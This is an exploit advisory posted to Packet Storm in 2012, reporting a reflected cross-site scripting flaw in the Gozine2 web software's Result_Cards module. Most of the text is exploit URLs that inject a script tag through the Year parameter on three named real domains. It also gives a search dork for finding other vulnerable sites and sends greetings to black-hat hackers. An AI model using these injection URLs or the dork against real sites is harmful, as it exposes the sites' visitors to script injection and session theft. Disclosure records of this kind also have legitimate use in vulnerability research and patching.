Gazine2 Cross Site Scripting

2012-09-21T00:00:00
ID PACKETSTORM:116776
Type packetstorm
Reporter Net.W0lf
Modified 2012-09-21T00:00:00

Description

                                        
                                            `################################################################  
----------------------------------------------------------------  
Gozine2 <= Cross Site Scripting Vulnerabilities  
----------------------------------------------------------------  
################################################################  
# Exploit Title : Gozine2 <= Cross Site Scripting VulnerabilitieS  
# Author : Hack Center Security Team  
# Discovered By : Net.W0lf  
# Software Link : [ www.gozine2.ir ]  
# Impact : [ High ]  
# My site : Net-W0lf.blogspot.com  
# E-Mail : Bl4ck.Intell@gmail.com & Net-W0lf@att.net  
# Dork : "?????? ???? ? ???????? ???? ???? ???? ????? ??"  
################################################################  
----------------------------------------------------------------  
+-----------------------+  
| Cross Site scripting |  
+-----------------------+  
  
3xpl0!T :  
  
[TaRgeT]/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=[xss]  
  
  
Dem0:  
  
www.gozine2.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>  
www.gozineyejavan.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>  
www.gozine2.co/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>  
  
  
GreetZ To :  
  
| Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.Com |  
| And All Iranian Black Hat HackerZ |  
Persian Gulf 4 Ever  
===========================================# End #=============================================  
`